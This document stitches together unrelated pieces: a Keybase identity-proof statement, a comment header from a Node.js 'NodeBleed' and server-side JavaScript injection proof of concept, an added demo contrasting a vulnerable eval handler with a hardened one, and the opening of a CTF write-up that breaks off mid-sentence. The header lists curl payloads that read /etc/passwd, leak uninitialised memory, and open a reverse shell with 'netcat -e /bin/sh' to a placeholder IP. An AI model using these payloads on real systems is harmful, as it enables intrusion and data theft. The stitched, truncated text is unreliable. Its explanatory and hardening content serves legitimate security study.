I hereby claim:
- I am simpsonpt on github.
- I am simpson (https://keybase.io/simpson) on keybase.
- I have a public key whose fingerprint is C709 0843 B313 B823 DD14 7046 52A3 759A 8429 29E4
To claim this, I am signing this object:
/**
 * NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660
 * PoC: $ node nodejs-ssjs-nodebleed.js
 * "Attack":
 * - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
 * - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":\"1000\",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
 * - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
 *
 * Insecure eval payloads:
 * - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)
 */
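The header above names two distinct bug classes in one endpoint: server-side JavaScript injection (the body is fed to eval, so a "JSON" request can carry arbitrary code) and the Buffer type confusion behind nodejs/node#4660 (a numeric `str` turns a string-encoding call into an allocation of uninitialized memory that is then written back to the client). The following is an added example written for this page; it is not the nodejs-ssjs-nodebleed.js PoC and the handler shapes, function names, request bodies and size limit are assumptions. Because Node 8 and later zero-fill `new Buffer(n)`, the old sink is modelled with `Buffer.allocUnsafe` so the leak stays observable beside the hardened handler.

```javascript
// Added illustration of the SSJS-injection and NodeBleed pattern described
// in the gist header. Not the original PoC; names and bodies are assumed.

// Models pre-Node-8 `new Buffer(x)`, the sink behind nodejs/node#4660:
// a number allocates x bytes WITHOUT zero-filling, anything else is
// encoded as a UTF-8 string. Modern Node zero-fills `new Buffer(n)`, so
// Buffer.allocUnsafe is used here to keep the old semantics.
function legacyBuffer(x) {
  return typeof x === 'number'
    ? Buffer.allocUnsafe(x)
    : Buffer.from(String(x), 'utf8');
}

// Vulnerable handler: "parses" the body with eval (server-side JS
// injection) and hands the untyped `str` field to the Buffer sink.
function vulnerableHandler(body) {
  const req = eval('(' + body + ')'); // any JavaScript in the body runs here
  return { status: 200, body: legacyBuffer(req.str) };
}

const MAX_STR_LEN = 4096; // assumed application limit

// Hardened handler: real JSON parsing, strict type and size checks on
// `str`, and an allocation that is always derived from a string.
function hardenedHandler(body) {
  let req;
  try {
    req = JSON.parse(body);
  } catch (e) {
    return { status: 400, body: 'invalid JSON' };
  }
  if (req === null || typeof req !== 'object' || typeof req.str !== 'string') {
    return { status: 400, body: 'str must be a string' };
  }
  if (req.str.length > MAX_STR_LEN) {
    return { status: 413, body: 'str too long' };
  }
  return { status: 200, body: Buffer.from(req.str, 'utf8') };
}

// Constructed request bodies mirroring the curl payloads in the header.
const bodies = {
  // Direct eval: a JS expression with a side effect instead of JSON.
  directEval: '{ str: (globalThis.ssjsMarker = "executed", "hi") }',
  // NodeBleed: a number where a string is expected.
  nodebleed: '{"str":1000,"injection":""}',
  // Intended use: a plain string.
  benign: '{"str":"1000","injection":""}',
};

// Runs every constructed body through both handlers and returns the results.
function demo() {
  const results = {};
  for (const [name, body] of Object.entries(bodies)) {
    results[name] = {
      vulnerable: vulnerableHandler(body),
      hardened: hardenedHandler(body),
    };
  }
  return results;
}

const results = demo();
console.log('direct eval ran code:', globalThis.ssjsMarker);
console.log('nodebleed bytes returned:', results.nodebleed.vulnerable.body.length);
console.log('hardened nodebleed:', results.nodebleed.hardened);
console.log('hardened direct eval:', results.directEval.hardened);
```

The `nodebleed` body returns 1000 bytes from the vulnerable handler without any string having been supplied; on an affected Node version those bytes are whatever the allocator last held, which is what piping the curl output to `hexdump -C` in the header shows. The hardened handler rejects the same body with a 400 before any allocation happens, and the `directEval` body never reaches eval at all because `JSON.parse` refuses it.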
During the C-Days18 conference, André (@0xACB) and Zé (@JLLiS), both CTF junkies, teased me into participating in H1CTF18. At first I wasn't entirely convinced, since it had already been running for a few days. Nevertheless, I decided to have a crack at it.
The web challenge starts with a simple visit to http://159.203.178.9/, which serves a page titled "Notes RPC Capture The Flag" whose body reads: "...somewhere on this server, a service can be found that allows a user to securely store notes. In one of the notes, a flag is hidden."
Without a shadow of a doubt, I had to find a way to interact with that note service.
As always, recon comes first. I started in the browser: after opening the page, I turned to the Network tab in the Developer Tools and went through the response headers, where the Server header read "Apache/2.4.18 (Ubuntu)".
My first attempt was looking for "/server-status/" since the ([status